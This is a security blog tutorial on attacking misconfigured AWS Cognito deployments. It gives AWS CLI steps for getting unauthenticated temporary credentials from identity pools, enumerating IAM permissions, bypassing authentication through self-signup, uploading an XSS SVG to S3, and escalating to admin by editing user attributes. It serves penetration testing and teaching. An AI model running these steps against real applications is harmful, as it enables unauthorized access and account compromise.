Why Do Organizations Prefer AWS Cognito and What Is It?

Amazon Cognito is a tool that provides authentication, authorization, and user management services for both web and mobile applications. It supports sign-in with various providers such as Facebook, Google, or Apple. The tool has two main components: user pools and identity pools, which can be used separately or together.

User pools enable sign-up and sign-in options, customizable web UIs, social sign-in, user directory management, MFA and account takeover protection, customized workflows, and user migration through AWS Lambda triggers. Identity pools enable access to other AWS services.

Amazon Cognito user pools can serve as user directories for web or mobile apps, allowing users to sign in and federate through a third-party identity provider. Every member of the user pool has a directory profile that can be accessed through an SDK.

Amazon Cognito is available in various AWS regions worldwide, with distributed availability zones that ensure high levels of availability, redundancy, and low-latency network connections.

How does it work?


The authentication flow for this scenario is as follows:

  1.        The client authenticates against an Amazon Cognito user pool.
  2.        Upon successful authentication, the user pool assigns three JSON Web Tokens (JWTs) to the client – an ID token, an access token, and a refresh token.
  3.        The client passes the ID token to the Amazon Cognito identity pool.
  4.        The identity pool uses the claims in the ID token to determine which IAM role to assume for the user.
  5.        The identity pool then provides the user with temporary AWS credentials based on the IAM role that was mapped to the user’s group.

       With these temporary credentials, the user can access AWS services such as DynamoDB based on their IAM privileges.

In summary, the user first authenticates against the user pool to receive JWTs, then uses the ID token to get temporary AWS credentials from the identity pool, which grants them access to AWS services according to their IAM role.

How to identify?

You can identify organizations that use AWS Cognito by observing the requests that their application makes in the background. The general structure of the Cognito IDP URL is cognito-idp.<region>.amazonaws.com. You may also observe headers such as X-Amz-Target, which depends on the type of operation being performed. For example, when logging in, you may see the header AWSCognitoIdentityProviderService.InitiateAuth.

Examining the source code of a web page can provide valuable information about a target application. The source code may contain hardcoded information such as usernames, passwords, and API keys that could be useful for future exploits.

Here is an example of what hardcoded information might look like in source code.

This information provides us with valuable insight into the target, including various IDs, the regions of the buckets, and more.

Retrieving Temporary credentials

  1. To retrieve the IdentityId, first copy the identityPoolId and then use the following command.                       $ aws cognito-identity get-id –identity-pool-id <identity-pool-id> –region us-west-2
  2. Next, use the IdentityId to obtain temporary credentials.                                                                                        $ aws cognito-identity get-credentials-for-identity –identity-id <identity-id> –region us-west-2
  3. Did you notice that we’re not yet authorized, and we have credentials? Let’s check the permissions assigned to these credentials. For that we  can tool enumerate-iam.                                                                      $ python enumerate-iam.py –access-key $AWS_ACCESS_KEY_ID –secret-key $AWS_SECRET_KEY –session-token  $AWS_SESSION_TOKEN

Alternatives for tools for enumeration

Prowler

Prowler is an Open Source Security tool for AWS, Azure and GCP to perform Cloud Security best practices assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. It contains hundreds of controls covering CIS, PCI-DSS, ISO27001, GDPR, HIPAA, FFIEC, SOC2, AWS FTR, ENS and custom security frameworks.

ScoutSuite

Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.

Using them is a simple process. let’s see how can we go with prowler,

  1. Configure the aws profile with temporary credentials as shown below
  2. pip install prowler
  3. prowler aws –profile <your-profile-name>

Let’s try to perform these actions quickly!

Export variables:

Perform calls as shown below:

Yes, it’s working!

Exploiting S3 with Temporary credentials

  1. Check whether we do have access to to s3 with temp credentials
  2. Yes we have now try to upload file which includes malicious code for example xss
  3. Navigate to the https://<bucket-name>s3.amazonaws.com/xss.svg

Misconfigurations in User Pool

How Does User Pool work?

To authenticate a user, the application prompts them to enter their username and password. The user then submits this information as parameters when calling the InitiateAuth function. Amazon Cognito responds by providing a session identifier and an SMS_MFA challenge.

The application requests the user to enter the MFA code sent to their phone, and the user submits this code along with the session identifier via the RespondToAuthChallenge request. Depending on the user pool’s settings, multiple challenges may be required before the application can retrieve tokens from Amazon Cognito.

If the authentication is successful, Amazon Cognito assigns Access, ID, and Refresh tokens for the session.

Authentication bypass

  1. If an organization is using Cognito for inter-organizational purposes, there is a higher likelihood that they only have login enabled and not sign up.
  2. As we can control Cognito via AWS CLI, we can attempt to sign up for an account using a simple command. The client ID can be found in the source code.                                                                                               $ aws cognito-idp sign-up –client-id <client-id> –username Randomusername –password ‘Randompassword’ –region us-west-2 –user-attributes ‘Name=email,Value=random@redacted.com’
  3. In this way even if the portal is not allowed public access we can try to get into the application via performing signup call.

Privilege escalation

  1. After logging into the application, you are assigned an access token (shown in the beginning of the article) which can be used to perform various API calls. As shown in the following screenshot, user information can be retrieved using just the access tokenIn the previous screenshot you can notice the role parameter which defines the privileges to that user. Let’s try to modify it via aws cli.
  2. Now by using –update-user-attributes call to check whether we can update role parameter or not.
  3. Let’s again retrieve the information of the user and see whether its updated or not.

And as we can see that the role is updated to the admin without any error.

It is necessary to check whether user is required to have writable permissions over sensitive parameters. Small mistake in permissions can leads to privilege Escalation.

Flicker Account Takeover due to UserPool misconfiguration

A Researcher discussed detailed about the flicker full account takeover because of misconfiguration.

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

References:

https://notsosecure.com/hacking-aws-cognito-misconfigurations

https://www.yassineaboukir.com/talks/NahamConEU2022.pd